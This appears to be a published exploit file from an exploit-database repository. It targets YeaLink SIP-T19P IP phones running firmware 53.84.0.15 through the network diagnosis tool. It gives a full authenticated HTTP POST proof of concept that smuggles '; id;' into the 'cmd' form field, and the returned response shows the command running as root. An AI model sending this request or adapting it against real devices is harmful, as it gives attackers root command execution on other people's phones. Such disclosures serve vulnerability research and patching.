5310d503ac
5 changes to exploits/shellcodes AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) FormaLMS 2.4.4 - Authentication Bypass
44 lines
No EOL
1.2 KiB
Text
44 lines
No EOL
1.2 KiB
Text
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
|
|
# Date: 11-10-2021
|
|
# Exploit Author: tahaafarooq
|
|
# Vendor Homepage: https://www.yealink.com/
|
|
# Version: 53.84.0.15
|
|
# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
|
|
|
|
Description:
|
|
|
|
Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
|
|
|
|
POC:
|
|
|
|
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
|
|
Host: xxx.xxx.xxx.xxx
|
|
Content-Length: 49
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept: */*
|
|
Origin: http://xxx.xxx.xxx.xxx
|
|
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: JSESSIONID=9a83d24461329a130
|
|
Connection: close
|
|
|
|
cmd=; id;&token=1714636915c6acea98
|
|
|
|
-------------------------------------------------
|
|
|
|
HTTP/1.1 200 OK
|
|
Content-Type: text/html
|
|
Connection: close
|
|
Date: Wed, 10 Nov 2021 14:20:23 GMT
|
|
Server: embed httpd
|
|
Content-Length: 82
|
|
|
|
<html>
|
|
<body>
|
|
<div id="_RES_INFO_">
|
|
uid=0(root) gid=0(root)
|
|
</div>
|
|
</body>
|
|
</html> |